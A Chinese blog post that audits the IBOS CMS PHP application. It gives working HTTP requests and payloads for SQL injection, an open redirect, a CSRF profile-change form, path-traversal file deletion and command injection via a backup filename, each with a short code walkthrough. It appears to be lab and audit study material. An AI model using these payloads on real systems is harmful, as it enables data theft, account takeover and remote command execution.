8、IBOScms代码审计

最新推荐文章于 2024-09-17 20:18:24 发布
最新推荐文章于 2024-09-17 20:18:24 发布
阅读量435 收藏 6
点赞数 8
分类专栏: php代码审计(一) 文章标签: php 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YINZHE_/article/details/136430760
版权

一、sql注入

1、sql注入(Ⅰ)

限制

r=report/api/getlist
{"offset":0,"type":"send","keyword":{"subject":"111') AND (updatexml(1,concat(0x7e,(select user()),0x7e),1))-- qw"}}

复现

POST /?r=report/api/getlist HTTP/1.1
Host: www.iboscms.com
Content-Length: 124
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: application/json;utf-8
Origin: http://www.iboscms.com
Referer: http://www.iboscms.com/?r=report/default/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 4c3g_saltkey=63nNHRVr; lastautologin=0; PHPSESSID=8fc8uo57ohjf3stjapiaq5j4n7; 4c3g_ulastactivity=5fe9ne6epqckB7fpglBVLuvu3nk2fL2z5pEkNLKlV%2BDBUL6J780o; 4c3g_creditremind=0D0D2D0D0D0D1; 4c3g_creditbase=0D0D0D0D0D0; 4c3g_creditrule=%E6%AF%8F%E5%A4%A9%E7%99%BB%E5%BD%95; 4c3g_lastactivity=1686657315; 4c3g_sid=OpcVsd
Connection: close

{"limit":10,"offset":0,"type":"send","keyword":{"subject":"') AND (updatexml(1,concat(0x7e,(select user()),0x7e),1))-- qw"}}

在这里插入图片描述
在这里插入图片描述

代码

根据路由找到相关代码文件,参数getlist指定一个地址

在这里插入图片描述

进入参数指定的地址文件。向知道有没有进到此代码,可以输出加结束代码

在这里插入图片描述
在这里插入图片描述

首先进去的getListCondition函数,是用来拼接了sql语句。可控的参数是$keyword数组里的subject,拼接后赋值给$condition,最后return $condition;

在这里插入图片描述

在进入getReportByCondition方法,执行了拼接的语句,而报错语句是在$list里出现的。所有的过程中没有对特殊字符进行过滤

在这里插入图片描述

2、sql注入(Ⅱ)

限制

r=file/company/ajaxent&op=download&fids=
闭合:  ')

复现

2')+and+updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,%40%40datadir),1)%20--%20w

GET /?r=file/company/ajaxent&op=download&fids=2')+and+updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,%40%40datadir),1)%20--%20w HTTP/1.1
Host: www.iboscms.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.iboscms.com/?r=file/company/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 4c3g_saltkey=63nNHRVr; lastautologin=0; 4c3g_creditbase=0D0D22D4D0D0; 4c3g_creditremind=0D0D1D1D0D0D1; 4c3g_creditrule=%E5%AE%8C%E6%88%90%E4%BB%BB%E5%8A%A1%E6%8C%87%E6%B4%BE; 4c3g_lately.SelectBox=u_3%252Cp_3%252Cp_2%252Cc_0%252Cp_2%252Cr_1%252Cu_3%252Cc_0%252Cp_1%252Cr_1%252Cu_3%252Cc_0%252Cp_2%252Cr_1%252Cu_1%252Cu_2%252Cu_3%252Cu_4%252Cu_1%252Cu_2%252Cc_0%252Cu_2%252Cc_0%252Cp_2%252Cu_3%252Cu_1%252Cu_2%252Cp_3%252Cp_2%252Cu_3%252Cu_1%252Cc_0%252Cp_24%252Cu_2%252Cu_1; 4c3g_ulastactivity=16826P2hblgxZ2YZv%2FzkL0qm4ZyvY0x7ge29SnM1%2BRZpBp0SSRm5; PHPSESSID=ur67vfu26i7f2fj01v2aol3r37; 4c3g_lastactivity=1687867850; 4c3g_sid=37WQgG
Connection: close

在这里插入图片描述
在这里插入图片描述

代码

定位到函数,接受op,判断op是否在规定的数组,在数组就this->$op

在这里插入图片描述

调用了download的方法

在这里插入图片描述

经过一系列查找,找到了sql语句拼接执行的地方

在这里插入图片描述

三、url重定向

限制

username=admin&password=admin&loginsubmit=&cookietime=&refer=%2Ffavicon.ico

复现

POST /?r=user/default/login HTTP/1.1
Host: www.iboscms.com
Content-Length: 142
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.iboscms.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.iboscms.com/?r=user/default/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 4c3g_saltkey=63nNHRVr; lastautologin=0; PHPSESSID=8fc8uo57ohjf3stjapiaq5j4n7; 4c3g_ulastactivity=5fe9ne6epqckB7fpglBVLuvu3nk2fL2z5pEkNLKlV%2BDBUL6J780o; 4c3g_creditremind=0D0D2D0D0D0D1; 4c3g_creditbase=0D0D0D0D0D0; 4c3g_creditrule=%E6%AF%8F%E5%A4%A9%E7%99%BB%E5%BD%95; 4c3g_lastactivity=1686657315; 4c3g_sid=p26426
Connection: close

username=admin&password=admin&loginsubmit=%E7%99%BB+%E5%BD%95&cookietime=86400&formhash=&refer=http://www.baidu.com&find_email=&find_username=

在这里插入图片描述

代码

第一个if判断如果用户不是游客,就跳到main/default/index目录;
第二个判断如果loginsubmit参数不为1,如果用户没有提交表单,则会重定向到应用程序的登录页面(这里判断如果不是get请求就进入else)

在这里插入图片描述

getRequest用来接受参数,将接受的参数调用dologin函数

在这里插入图片描述

第一个个if,如果密码为空或者密码不匹配提示错误;loginCheck、getIdentitiesByNameOfPass、loginAuthenticate三个方法再去验证账号密码是否匹配;
第二个if,如果用户存在并且不是inajax,就调用handleWebLogin方法

在这里插入图片描述

getUrlForward获取登录后网址

在这里插入图片描述

$refer变量如果不为空,指向哪里跳到哪里

在这里插入图片描述

四、csrf

限制

对方处于登录状态

复现

POST /?r=user/home/personal HTTP/1.1
Host: www.iboscms.com
Content-Length: 118
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.iboscms.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.iboscms.com/?r=user/home/personal&op=profile
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 4c3g_saltkey=63nNHRVr; lastautologin=0; 4c3g_ulastactivity=9a75IhoWmYHvx0re%2BUj3ZTW5g2whEZGOqefKDzKjP3lGTLoxpI%2BR; 4c3g_creditbase=0D0D22D4D0D0; 4c3g_creditremind=0D0D1D1D0D0D1; 4c3g_creditrule=%E5%AE%8C%E6%88%90%E4%BB%BB%E5%8A%A1%E6%8C%87%E6%B4%BE; 4c3g_lately.SelectBox=u_3%252Cp_3%252Cp_2%252Cc_0%252Cp_2%252Cr_1%252Cu_3%252Cc_0%252Cp_1%252Cr_1%252Cu_3%252Cc_0%252Cp_2%252Cr_1%252Cu_1%252Cu_2%252Cu_3%252Cu_4%252Cu_1%252Cu_2%252Cc_0%252Cu_2%252Cc_0%252Cp_2%252Cu_3%252Cu_1%252Cu_2%252Cp_3%252Cp_2%252Cu_3%252Cu_1%252Cc_0%252Cp_24%252Cu_2; PHPSESSID=bde57e1jbl4eq2bqduuejptr55; 4c3g_lastactivity=1687784554; 4c3g_sid=piICL6
Connection: close

birthday=&bio=&mobile=15611223399&email=33%40qq.com&qq=&weixin=&telephone=&address=&formhash=8d30a07a&op=profile&uid=1

伪造代码

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://www.iboscms.com/?r=user/home/personal" method="POST">
      <input type="hidden" name="birthday" value="" />
      <input type="hidden" name="bio" value="" />
      <input type="hidden" name="mobile" value="13311222222" />
      <input type="hidden" name="email" value="33&#64;qq&#46;com" />
      <input type="hidden" name="qq" value="" />
      <input type="hidden" name="weixin" value="" />
      <input type="hidden" name="telephone" value="" />
      <input type="hidden" name="address" value="" />
      <input type="hidden" name="formhash" value="8d30a07a" />
      <input type="hidden" name="op" value="profile" />
      <input type="hidden" name="uid" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


修改手机号和邮箱,可以通过手机号找回密码

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

代码

根据路由进入代码文件,接受op,判断op是否在数组里,如果不在将$op设置为默认值'profile'

在这里插入图片描述

submitCheck方法验证是否有提交表单操作,else表示有提交并进行赋值

在这里插入图片描述

五、任意文件删除

限制

key%5B2023-06-13_6VvdkJok%5D=...\1.txt&dbSubmit=1
/被替换了使用\

复现

POST /?r=dashboard/database/restore HTTP/1.1
Host: www.iboscms.com
Content-Length: 48
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.iboscms.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.iboscms.com/?r=dashboard/database/restore
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 4c3g_saltkey=63nNHRVr; lastautologin=0; 4c3g_lately.SelectBox=u_3%252Cp_3%252Cp_2%252Cc_0%252Cp_2%252Cr_1%252Cu_3%252Cc_0%252Cp_1%252Cr_1%252Cu_3%252Cc_0%252Cp_2%252Cr_1%252Cu_1%252Cu_2%252Cu_3%252Cu_4%252Cu_1%252Cu_2%252Cc_0%252Cu_2%252Cc_0%252Cp_2%252Cu_3%252Cu_1%252Cu_2%252Cp_3%252Cp_2%252Cu_3%252Cu_1%252Cc_0%252Cp_24%252Cu_2%252Cu_1; 4c3g_ulastactivity=bec4dBFZWyHzyRwk6rlqz%2F3M5X5aYM4f2c6e5yRhnHMLXT9QhCjB; PHPSESSID=tbo3bk1ptfgs2hr3r163tte7f4; 4c3g_lastactivity=1688044573; 4c3g_sid=8v888V
Connection: close

key%5B2023-06-13_6VvdkJok%5D=..\1.txt&dbSubmit=1

在date文件夹下新建1.txt

在这里插入图片描述
在这里插入图片描述

代码

dbSubmit参数存在,post接受的key是数组并且进行/替换为空,如果是文件就直接删除

在这里插入图片描述

六、命令注入

限制

数据备份方式选择系统 MySQL Dump (Shell) 备份

复现

&whoami>demo5&将ipconfig执行的结果保存到demo5文档中

POST /?r=dashboard/database/backup HTTP/1.1
Host: www.iboscms.com
Content-Length: 184
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.iboscms.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.iboscms.com/?r=dashboard/database/backup
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 4c3g_saltkey=63nNHRVr; JEXp_saltkey=i95GW99U; JEXp_autologin=1; JEXp_ulastactivity=8206K0qI5%2FP8k%2FB1gRtuU56xFbGnyktaCrP6hW5rQWZwtpdkk5nD; PHPSESSID=nej6cftvup2cs8qd4jqcdmkul3; JEXp_lastactivity=1688126770; JEXp_sid=Z1sty8
Connection: close

backuptype=all&custom_enabled=1&method=shell&sizelimit=2048&extendins=0&sqlcompat=MYSQL41&sqlcharset=utf8&usehex=0&usezip=0&filename=2023-06-30_yD6OXW6L+%26whoami%3Edemo2%26&dbSubmit=1

在这里插入图片描述
在这里插入图片描述

代码

Database 类来执行数据库备份 databaseBackup() 方法

在这里插入图片描述

接受的参数filename文件名,进行了一波文件名后缀过滤,到这里知道$filename是可控的。所以只需要看$filename变量有没有做其他限制

在这里插入图片描述

这里又对$filename做了过滤,将 / 、 \\ 、 . 、 ' 替换为空并赋值给 $backupFileName,其次进入if ($method == 'multivol'),if里的也没有其他危险操作

在这里插入图片描述

$backupFileName在else里做了拼接赋值给了$dumpFile,此变量在453行做了拼接,而在php中反引号 ` 可以执行系统命令。

在这里插入图片描述

YINZHE_
关注
专栏目录
IBOS代码审计流程-文件上传(超详细)
qq_59020256的博客
01-30 773
在C:\Users\gaolitao\IBOS\WWW\data\backup中查到了我们刚刚提交的数据库。这里出现了shell_exec() — 通过 shell 执行命令并将完整的输出以字符串的方式返回。将解密后的代码放入C:\Users\gaolitao\Desktop\newibos中。mysqldump [选项] --数据库名 [选项 表名] > 脚本名。由这里可知$db是config.php里面的数据库配置的值,不可控。这里的变量有$mysqlBin,$db, $file可能可控。
[zkaq靶场]命令执行--IBOS协同办公系统通杀漏洞
wwxxee
05-11 1888
命令执行 命令执行相关函数 system() 能够将字符串作为OS命令执行,自带输出功能。 exec() 将字符串作为OS命令执行,需要输出 shell_exec() 将字符串作为OS命令执行,需要输出 passthru() 能够将字符串作为OS命令执行,自带输出 popen() 将字符串作为OS命令执行,但是该函数返回一个文件指针。 反引号`` 反引号内的字符串也会被解析成OS命令。 靶场 本地测试 本期主角:ibos(一款协同办公系统) 版本:4.5.5 安装: 安装完成之后
九、漏洞挖掘与代码审计(5)命令执行漏洞原理
weixin_45540609的博客
05-28 687
一、命令执行漏洞原理 用户输入数据被当做系统命令执行 <?php system('whoani')?> 其实这个一句话木马的本质就是命令执行漏洞 代码执行:用户输入数据被当做后端代码执行 命令执行:用户输入数据被当做系统命令执行 因为代码执行情况下,可以调用命令执行函数,所以大部分代码执行都可以调用系统命令,菜刀中断操作也是利用命令执行函数,命令执行也可以写文件的方法获得webshell 命令行写入文件 二、命令执行函数解析 1、system('whoa...
【封神台】漏洞挖掘与代码审计 wp
孤桜懶契
08-15 626
前言 掌控安全里面的靶场漏洞挖掘与代码审计,练练手! 本地包含漏洞审计 环境 :http://wjbh522a.zs.aqlab.cn/ 默认弱密码登陆 admin admin 登陆之后发现是个4.8.1的版本,其实这题做的方法太多了,也可以不用代码审计,网上有一堆payload远程文件包含,不过这个靶场说下源代码审计,那就看看。 下载源码:https://www.phpmyadmin.net/files/4.8.1/ 因为提示说了文件包含,直接全局搜索include 分析
SEAFARING靶场渗透
kknifek的博客
09-13 532
??echo '<??
dedecms(四种webshell姿势)
2301_81881972的博客
09-14 964
点击【系统】【sql命令行工具】--》多行命令中输入select '<?>' into outfile '+路径+创建文件名。与WPCMS类似,直接修改模板拿WebShel..点击【模板】--》【默认模板管理】【index.htm】-->【修改】在文件修改中添加一句话代码.....如下。点击【模块】【广告管理】--》〔【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】账号密码同为admin。
Netty笔记03-组件Channel
weixin_46425661的博客
09-12 840
本文主要讲解Netty中的组件Channel、ChannelFuture和CloseFuture
【网络安全】-rce漏洞-pikachu
weixin_65311462的博客
09-12 1125
由于应用程序在处理用户输入时未能正确验证、过滤或限制输入数据,导致hacker能通过网络在目标系统上执行任意代码或命令,从而完全控制受影响的系统。RCE漏洞是一种严重的安全漏洞类型,对系统安全构成重大威胁。
YOLOv9改进系列,YOLOv9主干网络替换为RepViT (CVPR 2024,清华提出,独家首发),助力涨点
weixin_44779079的博客
09-17 334
YOLOv9主干网络替换为RepViT,助力涨点,通过结合轻量级ViTs的架构设计,重新审视了轻量级CNNs的高效设计,最终得到了RepViT,这是一种为资源受限的移动设备设计的全新轻量级CNN家族。RepViT在多个视觉任务中超越了现有的轻量级ViTs和CNNs,表现出了优异的性能和延迟,突显了纯轻量级CNNs在移动设备上应用的广阔前景。
CTFShow-反序列化
最新发布
qq_66013948的博客
09-17 537
private变量会被序列化为:\x00类名\x00变量名protected变量会被序列化为: \x00*\x00变量名public变量会被序列化为:变量名__sleep() //在对象被序列化之前运行 *__wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过) *如果类中同时定义了 __unserialize() 和 __wakeup() 两个魔术方法, 则只有 __unserialize() 方法会生效,
多人在线聊天服务器
weixin_61503529的博客
09-17 700
C/S(Client/Server)模式,即客户端/服务器模式,是一种网络计算模型,它将任务和服务分为两个主要部分:客户端(Client)和服务器端(Server)。在这种模型中,客户端负责发送请求,服务器端则负责处理这些请求并返回响应。客户端(Client)角色:客户端是请求服务的发起者,通常是一个用户界面,允许用户请求服务器提供的数据或服务。功能发送请求:客户端向服务器发送请求,请求可以包括数据查询、文件传输、计算任务等。接收响应:客户端接收服务器处理请求后返回的响应,并将结果显示给用户。特点。
【渗透测试】——Upload靶场实战(1-5关)
HinsCoder的博客
09-16 619
upload-labs是一个使用 php 语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共21关,每一关都包含着不同上传方式。
PHP随时随地预订民宿酒店预订系统小程序源码
2401_84413903的博客
09-12 602
在这个快节奏的时代里,“随时随地预订民宿酒店预订系统”无疑成为了我们旅行中的得力助手。它不仅让我们摆脱了繁琐的预订流程和时间限制,更让我们能够随心所欲地规划自己的旅行路线和住宿体验。无论你是想要一场说走就走的旅行,还是想要精心策划一次难忘的假期,都不妨试试这个预订系统吧!相信它一定会让你的旅行变得更加自由、便捷和美好!
PHP在现代Web开发中的高效应用与最佳实践
运维人生
09-13 1090
我们将使用Laravel框架来构建一个简单的博客系统,该系统包括文章发布、编辑、查看和评论等功能。PHP作为一门成熟且强大的服务器端脚本语言,在现代Web开发中依然扮演着重要角色。通过遵循最佳实践、利用现代PHP版本的特性和成熟的框架与组件,开发者可以高效构建出稳定、安全、可扩展的Web应用。本文通过一个简单的博客系统案例,展示了PHP在实际项目中的应用方法和技巧,希望能为PHP开发者提供一些有益的参考和启发。
CISP-PTE CMS sqlgun靶场
2301_81525518的博客
09-13 642
输入 -1' union select 1,2,3# 有回显可以查看数据库。sql靶场有个搜索框先点一下go,有回显说明存在漏洞。查询它的数据这里admin用户的密码是md5加密。有个phpinfo.php点进去可以看到路径。然后扫描ip目录发现没有后台登录的地方。然后在这里尝试sql注入。来到根目录有个flag。然后查询数据库,用户。
LAMP+WordPress
2301_78088515的博客
09-15 1210
LAMP—L:linux——操作系统,提供服务器运行的基础环境。A:apache(httpd)——网页服务器软件,负责处理HTTP请求和提供网页内容。M:mysql,mariadb——数据库管理系统,用于存储网站数据。P:php,perl,python——服务器端脚本语言,用于生成动态网页内容。WordPress是一个开源的内容管理系统,最初于2003年被开发用来简化个人在线写作,但随着时间的发展,它已经成长为一个全功能的网站框架。WordPress使用PHP编写,使用MySQL作为数据库管理系统。
PHP高效协同无缝对接一站式生产管理系统小程序源码
2401_84414018的博客
09-13 492
在这个日新月异的时代,选择一款适合自己的生产管理系统是企业实现智能化转型的关键一步。“高效协同无缝对接一站式生产管理系统”以其独特的优势和魅力,正引领着越来越多的企业走向更加高效、智能的生产管理模式。如果你也想在激烈的市场竞争中脱颖而出,那么不妨考虑引入这样一款系统吧!相信它一定会成为你企业发展的重要助力!
laravel 查询数据对象转数组
ddliyoutang的博客
09-12 369
【代码】laravel 查询数据对象转数组。
DNS解析域名详解
qq_71416673的博客
09-12 450
如果没有,那DNS就会去网络中的某台DNS服务器查询,DNS服务器中存储了域名对应的ip的数据库表,当DNS服务器收到DNS查询请求后,会从数据库中查询数据,然后将查询到的对应的ip地址返回。对于我们而言,面对长串的ip地址,我们更喜欢记忆较短的域名,但是对于路由器来说,更喜欢定长的、有层次结构的ip,所以为了满足不同的喜好,就有了DNS解析服务。你有没有想过,当一个url传过来网络对它进行了哪些操作~DNS又是怎样对域名进行解析的~或者我们为什么要用到域名,为什么不直接使用ip地址~
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值